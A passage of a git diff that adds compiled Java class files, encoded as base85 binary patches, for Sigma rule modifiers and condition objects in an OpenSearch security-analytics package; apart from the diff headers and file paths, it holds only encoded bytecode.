z)ZEislX}4WL9I?w7AUG5vHmyAO94TDK2l}a{~>k-j#eY9`D$Cuq3TiAGe9fu-vR@1 zDzBl@xX0a={!G+;D{k^L6|t=xab-=YS)#k${i6OWHR=`pymiplcg>0ijh)JuDE)rV z3xm*?g&`}P@g{>5UdOKu{E8t|@;2L@_hzkZzY#cJ?wj%M2;m{= zPV!x)ZP4>(i-qz|G4{SP7p^#{U8rm^-ab(ViXLH>%AAgi7)8HyoKdFJ+`3ixWfOiU z&@~jltw4|XQb6cxJx=l6KrnDku1Aoycz`RjoU3!|GS~Ru z`4*ZpU2kE-8w53C6MvhL;O}PsZsEa4cxWpgCL|pl!+X%e84+l*LXQ;T2A%=QEkRO* z2$dk08Q7{A5L;sgE@c++=up=p9{)R9I~UP@0h`tA7It#>)GfSs5xW+#_aZ`qa}}F% zD>sdlF!feo>br#lOPDexO!1}|Q~9Q35FUOP(IpjKJ(9b^n_Yiny0d@5ur<;nzG@_OZ$>tEy)`Q8gN{#eoWxv?SJ0H#EGtJ z`1o~v>S~6FK7SEgZer{NZA;s|(s>RqL-QgH!cu_)$8)%C9oDI=`&) zJy^?e7aqh8`r1x(Ba8ib3P(A95l=(n8FmA^S-tnN>~`ZEp9fw;PMf1wo9ptjIWEWM zXrVFAYcK7_Lp0t+Ds4a2_yfX{#IhMbq}d`L&gckGCzY|Hlb5&_?f=p8{v)vgJCVFi zR+9`k104n%8-x5|>uqdALj(jKdj}i1N`ybgPxz~1G0U$Cmt^KmG%NWVw9Bp1z&-m9)Ziqb5~^GpRPc%p&H4+9gsBQXPVT{@e6)c#`rD&ui*EbscQZQyn#QV<=-Ao B0gwOy literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaModifierFacade.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaModifierFacade.class new file mode 100644 index 0000000000000000000000000000000000000000..fa4be761de7e094dbcf89ec73ae60c6aa717ee19 GIT binary patch literal 5797 zcmcIoYgioB8Ga8S1Dj1ClLVrsk!VmZAuAe^AS98?5->mnQc{xGcGw+Y!ZNd&nGKNE zTWhVhwfBqK#@^N5<1LiXs%^El{^+0jJpI)l{oCLD+uHZc&aktDa~=(8~d+M__m|`32X_Z%qk<$bDey% ze8{=9-7pRJs6cUD{ir}mmzC5bC`LsTn-Ep7RbXq*CcT<7MY}{$iHdRvY>(mwl$N1N zpe$jTu4b5yf}NDFFtxjU9>Ljd!cEwv;AVl%IUy)O6d%HF%AC&d2oKkV%$_~h@Im-U z{pv|&s1b-bu4cQ=tl>^6xK*IHFv&-jxdgJ8VK1$sn@OMd?FCyU?(@iTuH(UtYmR>K zfP#jCBc#*gkmI^fAe!ZBO-wktt6;yteTCU0%lo9qC%40$^sre&M&n%qorQ5e&Gk8s z2LzN^!%WgK6&w`kE0n33v}T=d>EC|dD8pfaBAc?_BXF`Xw!`{lCZ*Z&xwNf2j$xTO z=It~^!bsW*7<>hqqN}faILGl`285PMDd-gFC`{gtR4T`>o9d_N1U&^iZaN9@k^eSM#;ka$}>*YDKcKKzEiNxm;dRp$l;&5jD=}KQ-mS551wr$x$ z99yOTMwHw2s=Iy@hWmsK>3XPv`d%RZiO0^Y*aJ!li?T@=-L3AvmMsb z>6D=-gOpEwDzlsC!e5{&KPAnlgS2#NrJx%TegYFKMEF024~@#6Eiuh*(oeHhwtkVf zhvnviZ_;e)c_M*-gzg20R$^f>SKkJFh|k2V&}T+&w=4 z{4iJWoWQo+Qkr9L+@!#pa2el=;`@?88G~q4OJ#Hk{xFIkNwAdQ34LC{^LbaUtPP}C zFGleb{FEU$r8$G11iXE)FsQ3ffLjEGg`pF2jb(9IU|RC=bsmMlgZb;S>V5F)4NTy? ze9}-s@CnrZk6aQYgQ@k*+lW|{zWQnuui>g}f~1?~rMsXUWQ`cQRr5sD5a|0p`+yNE zV<+?;Lv}hl*SMtbm)=I7>9j1@acwO4uZ;k0^L-W_LiqE2p z&G`t!wymNROJ(>y<1TRR8q;!XCajE^Y!bYL^_iw_d&jM_V|tseu}bZ=6jAVw!0r#8 z%IM5$&4S}aGwUo*m&LA#KVIfZDIQgZi0lpcTtbW=12}F5#8J)`MBi&zz?Oz3RE{k` zeGS_hUd1+bhg!Xe8;fz;qi#|6gs9up+7NYzS|6es)us>?Q=3E7-D*pSI;6ISs5bRT zh&rZrgs3hx9-@w`eIe?EIuN2xszX`oB~SAajy>4QaT|5tjtcDH_l7Dovh8WbP8`RL z_%LH5ftzswyYMjIK84*(skbn%)nI`(eH*vpuec4T$VFO?_Tn08&2o(5G;R11K1<7v z`Sw05ty{F67*9hqzKnD4VDl0L&HK?;aIQhEzKV}MBcbZC#(fJ&Txn4E1kfH2njlmg zK(!t;NvJ-6>OE+RP*VUkd5}SIk3? z4>AeG11Ro67NNcX>hqv9p@9Gz@SqEXh5~5FgX}9y7#nN23g;T;L0doghG$55XbCGW^Lq1QX?n(Xo65j;v+ zc#!1$Y3TrbdJLaokUdVgihm{Y2tMo2dJInxdy>>vR8*>Y|L8NHqi{vOr+h(r3jWTG zWZXWm(o_79JVBfxxrnC(7V#B!0KOvMVLN@0V*zP}t-X#YUvmpzrwl9r)Vvr^@(stt>HrATTd zr7rfQ-r|{PjPjhJ)aOFsSVP$sI8W}+gjUJn*L*CZt*-HJ88>>9|9^)+kWz`ig+Jm? Nbg9df@z15@{{^>*+{OR^ literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaRegularExpressionModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaRegularExpressionModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..c74021556f1e17b23c304e3c907b03e85118dda9 GIT binary patch literal 3112 zcmd5;ZF3V<6n<_RyJfqD8ro{9$O1~!7Q0GCtBH|Pf>csU3DX($)9vOqy|~%U>~@ zTeyMXzP)b+!j60ycDT!(PAKib@*_tCR?BP1Jt_Ras>^1J-xJNq;ePdT+ZRC~J$Ey? z*N|seA5Q2FcOuaf#4uWxt_&*-JH=W?f!^*zVTXy0H$+GqvTY+2ty1kFf5fdQl#W%C zL0DSYVK_m)xIBz}!SK@?P*UzHb-3HK)*T)M<)y5i48*$^l~RR%%JlrY*AO~JFmB*2 zj53_6Nmty7TD!u(&vza2s8I84?(A@1s(o^p5BFujusx(5uYC6s!$cz;aLR(LI$rZ? z43oUwcBE+ZB0$DZ4!$MBOuw(4cF*6v0oph8Bn(DVg!f7BE$N12<9u-;cAvMoy)P`= zYqdN#uv99nSYgz5gmsropTf4CjqT!6pg_Ys!&=5biX*lz*2b_{^?lFRu)wf6q?lu+8;fKt z94ad1ti_#53soM2I6SnR7znc(k$#z>H6BBfj1Msw0cE+4%UIU%5yMJGDQOoBSooM4 zqzr0eFJu@gE_|mXUNNwOPZ>1AqVCNUflJ)@VvI-%M+d`a28{r#45x{7?HIxqdTdH- zw_lFqOO!PbV4dvmqz1kMHR*gHf25{ErfiJi8pE|D-%N2dBbdFWW_qsEF=Jr2Rc|sw z&y3vUwqZU}b3mZu60WP}w$3n}281rUP#4rOhpK^__=aJe{MhnkQ_|eR(C>D_pko%- zRhYgta2qu;*@>gKkrv*EE&sjdN62=DtHb0aMfSxoeE*AlrtV)4x&6Z?ZzqF>UiTv3 z7B{6DMJ~R6Xk1nqMfgwYL!&9^pQ)h+IcT)YVGJke`#qhjdu?&)@*(t}V?u-ebs_<# ziD3p4v@*M7IEhoVBL+<3Z4#+g1)L`8DOwvxC)0F7BLv=|Z&%^FvBE3yIWSh3EzCW~ z*=NL+BR-HOCGAYCtt)3N(MG=F1JeItOqHV?E+#S;W0_CsPFY)7I>6EstkUO`KQQ+M z%ZmrN`T}1tJjKLITzXLW`Vecsy~OMTMe{r64shcTx1M9;8B>I=LIm%gs;GdYjfc-1{3ksoB{8 literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaStartswithModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaStartswithModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..9da9804159a86ff1f2025721cf795b29384111be GIT binary patch literal 4149 zcmd5X4%4Y1$U|q%@x&_qst|3a$`yARabLbhH$l}RnzBm;keqgUT^Yg$sOt5*JYy; zzEF^0D0OFTh8r!hYKWn4R5x`w#xRpD$24fo-V;?BI(Jb>+US-!DMhnbzQ-51){?rR zm33DZb2AKE353aI%MlDezlK9bgF_8&*0qwsU3YXSE|Lv_UX4m|jQ%{=6D6xAQs~7S zDz>1HVS8CO#no1GRya5LtU-wS%T|>eGu+X=efTgT8@kJIxl2Df6JBK4R*OcO(jV9O zOVY)V=C*CD&q3l;q>_Y|e+zZC-5% zt!g!!mg#C92Tp3TWg9}f#&w6nc0HbCr{nptkj)Wd(X+9lf_)69W7di!pW9{Z=w@BP z{`jRE(Y_(-ErUDbi?$fuQK;dQ zxB>3-i)e|#h+W%We{i*NYG}eK2Is`+itDr(QsawNVSAm&RdAf45;G&Btrm3Gj=+vP zj^!{WyMi+sw<;s4^?1Fpb9QaVZ(VVnh=#Q56FXW!%tUOAfaiG%c@z{3F`SHPB?>{s zyBMY`O?S&;PBQdnb9X$8@2PknCm0lJBEg%T)D`@z$}jGa@hN>hCNL_ zFG`kK<e5c^A&D~V`ysH zYB^PL${&{catK-;Kz(N0tsxOWZJ~ zbt#J5`|wQ?i^NqnoTqtm(lmwR|6C9>KYYt@v_p3@zZHDXaNy;l)TjcGG;`5;RI;E? z;yL=z1BG@yNMb8}-=*i?dnG?q_!X&Nd_k2yQzQcHB8A=9Myo@C7~aHo+K~d%c#BMW ztA6Yt>7BGz+fR1U6B^sGhrWXY_xcB(@Sg+8{!IVC3f_K7T0Nu(I?1!P&p$1&lMGLz z0TY9C{!x0LAgN=a#jIzM8dxG@p z_WUwFxm{SnmGaQjK(`d=4m`%0KzE>0SjN@<8_T%)1pEE zupgn01_94dAavZLfZZZV9rLtW3%e&}kW`a&cOvluBMLIl(f0!96bwA4jQ7H%cRjFR X(|3|&7wG>!mS~rv)dPG-eq{au)?yn& literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaValueModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaValueModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..36daf011c445f9995a8b5eb0f77b42fbbbe930d8 GIT binary patch literal 1761 zcmcIl&2G~`5dJm|bsJh53bg#wa-uE5M-Gl6P%siw%7Iq7aN0QAWUGyB?XIilow#s9 z;=lv&P>9*oMu{sS%TjI0yE8lU&F_wX|M~d~z+1fZ&|v5#dh92uh>hSnn)pUUnU;3O zW3FaaM#k5f62_kd8!*zjGOBny_IrvO(>bad zNh!TWR)Q|Q&h=(58HpBFaC-x{u*$I2m$CSqO@~6C@}Z)Lw);uM)qrd1=$zTK6KNR2 zntm*mIbhfvEhd?|rz-A$D#g&|X{w|c6;YGJ?Q;DXc9!FtrA3TqCD|J)19j-UN;3vk zxp`az8b6eFB6M(2HCszs46X1o5~*u#ujAoE~8nmN9M5{Na*04_NS2}g)-r>>fA8382 z?Fu&N+af{W9x2?%ChhjF#Bc{&M3Dm8xJ!_3w@q>lk^^ZLoCj#oKV}EJbn=i+)=2*m Qp5R$-{sl?y5x;@`zlm2+6aWAK literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaWideModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaWideModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..fe900e995ee1518b0cfccb37ba07e2185d952903 GIT binary patch literal 3991 zcmd5zhM-_SSV7E zWEiT?&onnHYmOKi`wh$R1{kJ0^D!OTb9aR9g=q~7k6sMhy6lNkHh+gNa;@SSrj|Ec zFPoWWXr}Zn?o}MY@beo8(jNphxwW7TncQ{zyW&=|0pc3G*#Y{=)RRMYL8Pz^Eh-w& z$gneSSYo_VniI|xpEIeV*1WBAbDBGbd=G_5uV}ao!*%8nZFQDmdm)N3H9oG}e`plL zE?zF1hA7mErhIp8Y#+nESIeuGYbDNa(0xN)U{Du?H$`zT8J0&mc64U^@_Cu-MWN|- zsbpKOCcEFOd6lv$w5!~32)1kSG+$5r#6UR5k&z2R}@Y* zh!carUa?}#t1Dc8++mO4Eyrae71iy>=YqINL`$wa;%h5w>l5cAATv+l7&;UjXXuUT zC0c@tPGo40Fx_P4maCYP zBdZj-J5F6}0;xmJ*SxG}VS{bZ6x!>hhN0pP?vgF_A(+73VVv~=l$ys-QenZSL6P+` zT;435dMJZ-t!;}EzO!{&GaCFRnfr(-N(|?>=4K6X21a9ZA+B|VdP6`NR^l2*`R0E? znRH66mw|&?YA{Am79lPXj+ASb>qJZ0xJU&sUp2WdinduGOUdvIKgD(M-={~1S0Xh1 z?ieqJN8{9_U2$|VYRJR$zSsWQoRox!cF;ngzf7PjaS|GlfI@ExG@+U9vm}?_l@ndv z%Sip=E2?x&kqWSn4Bp0edTI;Qumd~kjSR30Z;?y+)Qa7ty@#IFHOXF*P+DYN3;2#7 z@RTnntJXAojss80C_!eRK+@R(KUmF85RAwj@2$BxBHgfuR7(TtKk8b-(Z~3KZYO?6 z`Z4aW;^fRS-XD{a7f3ImcLnEZ2_~OlFr8e%hYT-}8}C`d@MCmzuVQ3|odO%0J>5$v_B@CAl*v+(ekrH@ zYa8LyPGoq5NcSi%64~9xap>s4U6NJMg$K0ve~%vg2+c41Oi}E3K2bC(s5y3 ZrXUwem58*ac@T-fn%ptmr)vV={sr3R%Mbtn literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaWindowsDashModifier.class b/bin/main/org/opensearch/securityanalytics/rules/modifiers/SigmaWindowsDashModifier.class new file mode 100644 index 0000000000000000000000000000000000000000..909bf1a6672ebdc0e4b0152004391eaddd6c3587 GIT binary patch literal 5579 zcmd5=`F9i775<(L9z{&RkrTiW2z3ncf-@}HW!!>+;vxg7T~oG@C+S%l7|kd%BZIT2 zOVTyn7usg;-n1ocVrktcm3|@qyJug zAHe;%uAz-#%yA2bQx>)-xSJ~)p2$^P)1T!ww`P4a=NWFr5}r|V^5(QDT+f&=3nhNs zwDZmdZ$I~n5ni>^<`oTbh76}&X3UT7e0M49ed0d zrF7;TpW#NuH!UM$dVacpis2@*!sdR(6%22F21-B}++hPAa;&X%i|PS>6NjDo?S7lc1adJmbl zPZ;m&>krK5Wu7YvBj=P#j_nyT33eNPrECe~7&l#V+r#lrHUb|QiPBlgELs~$YuLc> zK+IzC33F5`6TWNO1r4_|q?dpDz{N7RJu0*$He-v1I~eYiQa;54I=+A&hBjxK^07}T zm7_rwt0qP(aUI(cRL?Af6}zZqWAKavre73pI@A-RAJ*Jr%x_8EaNKH90w(jVzNNJ+ zC+I10L8vCTtg)dqm!EWj2PE<&?n1wYK8D>frKl$87{DNLjp=2?w9nAq*MCw<9MW+& z3+x=dz`)ColW423~WmhdoikEUyaD{ zu#WvWKt6Cq+2T2(l>KU%juyE)As(v;J6Fxcupg=Gs?Q<>Np$1OlC=&o+@=bQ_WP$2 z_zD?vdf%xb;;-;Xp)ieCUtxb#IkE6%a2oEI3`_CbgaB^848htAjGxOlq9Jd6t}jNU@N}* zx{eb#$kPu)E&MfjbYf_4F2Nrv;^9YmTsO1gTyL(%7Y5j%G~R zN@jFiz(p!LE9fv|(J{4+v`9E;pWzn6y>atPZG5s-(0FKNdG0*JCZ#wUlZauV6&0Tg zdSGnjjci*cMy2*zrr$6Md+phywm3SiPInW*7^V(Bvd8iq^|*B00E9h6#VJX0L{8}w zKE-;Rm!nsKgvCqQJn!AXkcmCGG>UKNFiCt9-`4Q0GAS?v;yeWT{$%_h~S=@lon9p@XS_Xmp|Z9z^dn-J=6-(CAwm61a&zPtmU2 z*9Hc+UqSLMdTfVI|C4kCSWg$aaWg$_36Ehl*3dV)fKJ>(BIQ#GU3B_Zde#?LZle{N zJ+Y2HLxt-Dg}Z`vAd%`$ZJfuZ%XF(P(AW{&-4tjG3)^eT?tMLAmoIiHYJ2|PbI zhi#Ye2z_k-5Z#wBc@;Z=@oU(4;u^Y7$o1>EXAbwJhEpSR_|g>|OpVRsaO&YXOl+US z@dcb>xC#y|Alrs{6c=E(;W|!Vfjf`NWhODM2rzCAZ0RA(d&#yt$+`jT!63PD09gzv zp2{zJDvwz_PPVPXVLX8+$qwnMwe(5oY454Uy{BpI8Cs=K{Ri33q|71OlyN#kThiG* z19SL>g#N-M+>-kKJbsw^8U35bFD?(vD|AjO zYX{pvswg!hReOR|0lK97NZsqHk<@VLxcXoXDl)t927VvN`vd)N!yoY{`jlq=gLGWR YzwvhP^bUD=f&48~jNuyI!w2a8A2r|OW&i*H literal 0 HcmV?d00001 diff --git a/bin/main/org/opensearch/securityanalytics/rules/objects/SigmaCondition.class b/bin/main/org/opensearch/securityanalytics/rules/objects/SigmaCondition.class new file mode 100644 index 0000000000000000000000000000000000000000..f12e3704952e89b1a86fe3ec0f1c163b6fb6919d GIT binary patch literal 10518 zcmeHNd3+T0761N{O=hzhu8pVx#fV(lB&-4gArJ^5NF*eYgwO;$hGa+v_6V~RAgE|- zwOHF)TYI2AJX+IgwI1X$t;K3D+iDMc*}Jv3_HM1Mm41J-XOdl=gnrsT^p9j_e#iU0 z`@P?L`^3u+KLTKds8f(7uqJGF`orCND57g-dzU|=xA&Na)vJZHK(A%ANBm|_K#%yt zyY}eqR>a?AbOyERaHzwujBrSSOJMpQZNKIZXrWGjgS|??V|3^t%h+w`rhvCDxuD51 zjZkNWz!buWSX#(x(E>fX8+ig#cW7mYs><5VEh{g(^x_gi+1JAbF(}icPQ9Z@V!0Gdx3ndv(wZ&H7N;lt3$VlGT*suU7bTD zN6B?V0s>FX?bghQl;3)%uo9^G6AIF3!;mx(*XV~pSb6wrIQ-I6WsF;de56V%YV3oj9hdP~Vcq&$7 z4apDayDfp*G>8^EWp66j3OANW#MY^(lJIj(qqEDBNLQ4MvYCwwzLG;KS z`(JHGoGK~PgDOr(p@Ks+lgZOJ#x2Twf*$S?Aj(P@!$Fcbc=E)P@reY4x5|~zJ zg!KBJ;4a;4)^-J$AbIP;?OLEkGY$D28+2J+2Gwez-$ALBpE(61CfCN6J$pLzFUN>etM-idce@afqcL6g~rVe0kaP<>B;k#j-n`7s*PlKn8#JBOM+ z8Z8fo(I@}iBmX_3;xm%}ZX>eA=;#PAu^q;vDn2WDpGV#&M;}-5IXRlmQJG?WLB$v4 zR>g?a1iP(X>6@QW@nw94PLl@PO$QkXhc49*cGH}U$tYt6osX$z_2@H_N_qr$dT<0! zsrVYcPJc~=tCBYzDRP00&hg2Bg>88rd=uYN@U*}=QW~$~u4JbF?J-Ig6Y_Y~cIp5N z$modPkucmSeU7iK8H|FSb(%p=HJAy&)HtWkYE**HP!UCuLWm-_!6}?qV!gnrqXTho zcRUzh?-YJ2o+t0glin$o`d9L{^%JIR4h{7csAY+Qg5piusxmv7XUvWH2}wY-h%@d6 zD6*a#yT~z#lj2KsQ{4SIJ}Z*~I+bCX{TmHE&{4yhS0G{+#cJq+^hksS9mnA|4b-uq zDpPOf35i$6LtR2Njydr<*H41$3VtC_kPNg{rm6MH@}>vRVxBC%{946t@LL({Sgn*r zKzfjPPGJj+&dDCH$j5W|y@KZ%JCXq7vnu`|!=Nj~j7VlGe^T-1SRC9cOBZtNae3a~ zRQw$;$l^~2GuoNyB72)W=|vU)v;lN!k$M7UP8;)=wy7&2{Xo>{^Af|1x*Ux<(-lq) zWwd=(2+=d9X!N?G{x95v5bYC_SiJ7-Fp7*8vtya2F+HhYC&Q8dryCYx*2K8{T8djj zEKc=CvDh`i^6hJhVQ!JbqJ9y*x=@(J3%4u>rq+5#U)AhrVz<`h4v#AGh02H#F%GeO z#2aoc?@wZ?Dy9i`%#@&JvBtrqZd8bf3#CmFUV#k`jX#|gCmM(zaf&!q5i@yGGOSgH z1F}CSn_a3nO`OhbJ;KIfK)1pnNrGL?O=h;42=#~=ViwDjVm71j*t}C#QaOL7D&`25 z)bhK-5v$P*w=*XbxOsBL%w*XpH4RIkcM|-PUQZEc3p7t2NM_f^3${2%74yV=Ua*7q zotuee`b*&?Et1$TJgL(2m`qoqT&xP8MA>b(XShHPma3vm4l1%I#4)MuewGOYn_M#& z)ut(2$Q4Uu7v=?N0?Sl!zRZwvSp{LPu80-RFH31Oy(!jd_K4-8T1K66i$rwFfsM9_cLb{A{q#n=RXwV7 z$P-d4iHf*TK%cOAWw;>6&P!hpVv?VJ0%x=Cm(3q=sPM|hEx#0gWx>sF_D%V%+TT<7 z&F*Ppej2~om`u!j`OW@g;(H2Vu-j+vWv|bEvd3pX*%z{(Y+l$;_FwELTMc}=2&2fx zYc3#e;NBdLKJ6RCIXLXe^-g>Bn^w6vca6Qg&}FZ` zwjbAV>`3b%-rA2F9w1%Wcsu`ZC9i;0qAK977_K%OkZ`S4*qDzKSt=j~X7c2r_F z)?zQ#VIQioA2qlZ8(Fr!fCcGV)>+iddUJxZj~{T&4|$%-RnfU0aZU=M6uBpOuoME#vK;XFniSl3 zf>Tk!+-Hxzgt-cS%r!s7&(cWe=eBg#5T-Q4Z6kP=`uEE%CByiYz$#ZC$_rh?_?-YH zRbMuMKOV(dK0g0)91WDvs+`io9NN|}{+fmDeaJ5@i@wTT{}8z4#ABsN)-7N|AJkJf z`|xw9K=aYbdT$r?*5FSY_E1N4GBcRMs%;7F+=hSI9)v$)z)O6~B7_qBo2<$v3>7cq z1oc_6%4aJY*He`lj^%p3#nuby(d_jii|ZvL*CG1^RXWGkX1~I^gumCqOj-qx%%xEo< z&Pfyuio*Ibs^4W|K%BA4Rp@$D6wyKoUB^YykeJ(t*>Y$>Y-qudSkwo1p=(H#+#dsc z8*b(PWu@7}VsRGpkn^%=n@2db-er$ano${+M!yHd(xd1q&52Dmc&FJ&wTy`6tuY`J zcyfMFtW027F)<89QXe)lN`Ss9A10+~QKchfdJk68cWuT2YRZ0e;2>^iSM4EOjwfkg zPvHv6{7O8J!y<>R{#;yb>&qq?n}j>AFT8-Prb;uF#=pfHTVKlfL&Qq4mU3E&Qn8MP z=OVNfqDrji*fWW-xVc4l%2*|}WFg!yV>7iw5i@9J-VF+dUj!BKh$5D!4Dg4J)m)w> YHi#NNy?onuTV-;38ba1%_L!f0L3H?EqTz;q=AG65_wINo8-2Wne@)2 zZHl#kJmet{Uzh@lhy)d-D6|PxNI|Vq5fKqYT&{)xbS;;^T<8ztx9`0(nVC#oH=%2R z%cjk}=bU}^*{^T!bI$E6A3Xm8fOYtjh8%_UQL8@~9Wo*@BV_dq1Y<_euw}+aLXl8- zByRS^g4S@@hy|nDwi`Y1Sg^zF9}G1ZaW>3oM1xOZ(e}`;P%s>d^atB)Duo5T35w>p zF&HCFi%m2fH^adeGZwE=m`7HTP<+@j6pm*M*S2^ROBlw2jb?nnusl!7u8T-o<8|Ha zENbfbqfls)Rf`$fVMh8DF7V1TRTpx3XD;(<9YfmAs1Ju?G0#TniAH)&@oBI=@wRbG z1NAwX9NXGm6Xg$uEF%(EI5amcJ%&dXrB05U74mD%h#9X_*t9kycs&PEn#0RF75t5R zdW<1)LQF%ELZe4DjpVcpd^TEE)KconOc6atMXHFNCuIl6$uT_R(W6n)MW4=5A75BV z2>9xwy@nsTSgK@70=Q!5B@@|#wRtbVHHWQ89LUYj7!JNy(}5DOLGCr6^fG8 zsML&=8iPae5kD5AQtWrO!l|hucEl~_S0QW2p_$N9KG zp@7NU3dIQ{EL~fc0(Hi--CtA4V)`i!7g3aHhKW%f)nGFBMT|YP*OCN>RD+2_*6XOl z#mp*Zti`r0)$7)cUdqUyPkY!5S?exV5Ol~qR_8NKFZACX}@sS~;!{EyE({?cQ zefqj2bJt#z5)u+XGb?bw*%eH9l`cJTc{FKul}=91r8PR@p`IPBp&?i41$|a@u)*k) z63A+$(2$H@eZU+PMx9fu;H>{0JhFi zpmw8wI2^JX_Y7G^EJmZbEV)CRKb8SZe!|KvMl?{M!)b-tToz4|^i*u9sI>=9!}yN1syEVeCbC)wsm+~_wf4L32J zOm{bhqah~yT->7LbGVfTiANpLGqbd-kcQjS_+Ao?hK*3f&${(_DK!hlK6mN38~5;R zBlfY)tFU+NM`jBV?p__&;rasHPwBU^3Jvk(X7rZY!o~d9hDz=`dsCoXl(OM>kxc85 z!j2&pkCcR$3@rvv?ygXnh0f&JN1@)U&i}=e_AxS%VkEWNHt!NKXtZ=ty=Vn(lmU_H$SDEDoYGY)i zEn>9wF<(A5_aj4n;?U109(`8F3>FFsQ-@x}3?)>PT>s;B? z`0+HJ(QuI0Bp#J_3PvL6b^H)NqLOkPp;Z+&r`Dnm2`Dk+b2<)*8FOhy4dV(|dXzJZ zlTI8=Vut5+91&gS4Vt~ZVT0Oe_z90#b6+nb%w&-lbxg`41@;D;1X3bilCXGGw)H<1 zZGR>Qgl6}slYUTHj$=~mejzooJ0oB6ROLq-j@jkJy&q(T-0maElcqHuVgaEymr{Q<<>s_sF!Ewu~}Z}&dE7h ztSncaUIooE-M-)SI{#$JeB!k7VN}UT9?re3T0T4F{+|M0!*9Kp@DuC?xkqQ6NnU6P z=9%n@(vE(zH)T?Mbw;P>>@ugo%P#S(vQl;y?iYatR9v_vzniS1f*xyMszNl)yK|eF zdQ$lKUJ|psc0`A*9;3;W`><2eKggXeM;isbITA4}TM2^!lxH8^u!6Ndm*4(!kt27> zY-w!epn(5)@tSNGvdvv&vOS;FJZ@njXD;FlA6tvvxu;+Wp#H{@e2zREIE+&R<!#UluI9mcs^$|rE1LUrC4&MnTH zz=ew2l#*&+vF{LSN1<01ZJ59%Ik-wXn(Pkcc96Q6Os9_9G%Yz8#lnESFc%$z9w=%X z#}#~k#+Lj_{%)f5z?sxz1@&HuBx_otzB@{%N8)(jLRFZ*^`vltz1odavu`Pk4=o?jm zz$E%6FrY92Zqm1msk}Fi@DEoX}d{YmUrjGb|e@VDdXF}z;vJBody zST#*l?3={C8H7&?;r@{&APhP zSI4zn^i;a&5o_AKPM7Dt16WdC>>I}yD2KCnZkG!?37jeppY`)Da~c7{wcL34faSY)3sKxB>lWJ5YK8|J{O)g_>Y{pSOUquVvMl0UqH-^9R`A@Vdg)7vl{Kjw^+SOTDuPU%rU5HNA zfUDG2T&=E0m+C{e+JS4-Ag)z6<2v;Ku2+xZ2K5-*PoY;GgrOLY>No@OOG#cpqQJR~Y71_y@kqQ6JaV@gOD6<0{*kXY%W(I zJn3w7mlD4YH$k_PFlkdP<{+VJP${;NQ z5pU1M{N+UI*l6Mw2WOZI+GlJ=96*iarggzr`77w6kaJt$9h zm)NZpmD5dja+w=I^FJ^c6mBP zQq4l7afXmvg(C8-iv``|AGJ!_!vQ7oy1H%1Fu0u+42Uqd53!Q%BmylWEY449 zF~;~V>|mVTjy-hw2=TfXZxDfh=QX~DeQG84t4iFgs(C+Ni(Awt=HhlXaW&&D%;`KgfcS z&vgVxuW~$52OaufGawy$sd*0lYf1XwkX|rz6AIhy!pD+om!{VRAcO(+DRCjdSLsc` zR423~v5gO@ds0MERrPOFO|djP^)h4LD!2Y6y0LUAHGKoWqm~Y2-W162t1&O7`OFhI zh--4}^eCGw&?I6u-63$zrto{bm1Oev3??fxnLL<bnJmXT1o>Pd+0>QD=G13Sld^L8j4e1=_PN!= zuRUpHv#kwXJ{M7()LF(ZSB91?{Eq^USjjvmyn5DzKH29+hp8#8p)y@<&C>mA;MlXPSovJKU|0H<>=%TGt&E+@3107)Z)Inv8N#iJR3f)Ua9^EA z6Rua6xs9u<8MpR3dx`1&4k}m0{`$RwXvdL0dsx{qYv4S=cAt)H7l)MwN=GJ>&KOwc zA2!N4X$!k-E)?vVqd>dufqc@+bQ~GZ*x4-Cr&)@8`)8YFc2JxV_$V`e>s;-|5c8=M zuba$XlwU6YpONlYri#8CY)|*wQ3SBU#1gC&1nTPd&VyjJi4el-ZmkIe5p`E@Vm=}U z8U(FA)mcFiJ-ef5M3aGw1si;_@mj^iCAgG%h3IyO@YCsaPA5yY)ce(mmv4(&;sz57 zuu$D?G_eS0sk==kYH)UxcUPEbR!UlE4G$+rJ%CuvRAhJOhYr}8Uh6=T>8_?L-KU^8 zlTgp@%V6$Mg7DeySG>xIsmcSQ=91DGm>S(#7VODceS^EKVf}1iTS+0|z^Z}mT!to*Jpez_o(vnes@NGf`ZJeFom( zAFfYP*6gtQtbW_Xe!P*1F{=u-@${Nl1JBORG+K z;vo|W+{m)S>hEt$CIvCqYC00y)5)Y$hPTx3SFV^eF@%)BIAmqJwbv0N_Zt`%Y@6E} zl_Z6A8ekx-m~qxl&OTrz+cE?BA(mIgQX>Mo`_|4>HfN>!?Ar9fT3r#BSfe(bao&0- zs6A|DYwaV$T$9}&#Z4GdNPk$c*z2oqu~olUDQMKh&G=R30xGDCt^lws02e9KB<%je zN(gL`A-DDyoaH#Jj!P#HIHK^munexquUQL2-JL*TQsSWL%Hfu|ff0))?Jb}FOl)Ta z^ABdyLqyhLz3q5k1r7RLPnnzgbfnXOgy8Yk-e%9TT~lp2LqfLp_LkS)>Xq8$`NpHu zh#$f2f~q&YHHtReVdA}bAA>(j2cz4st+0gpH+q)pdaoM$0TUn8(VED13=QW-qxdjB zV&Kj~4%9KOvs2c@NAVkkfov{gTSJ12>%2S*p6*PehdG2zoQ?EMQ+MI0fx87uXVO#& ziHUpgaROs@FhQ_bR(G`*j!Gz7qWB~}ZQxUa^Jg)05h>_lrNUUTSk6oO=uVG{4 z^Clj`7pSTsYtZKIx6jI5$6Yw@6rkmZ9cz9DFKS&iIiiSRM5UcaOngZhI-JOM>BQ5B 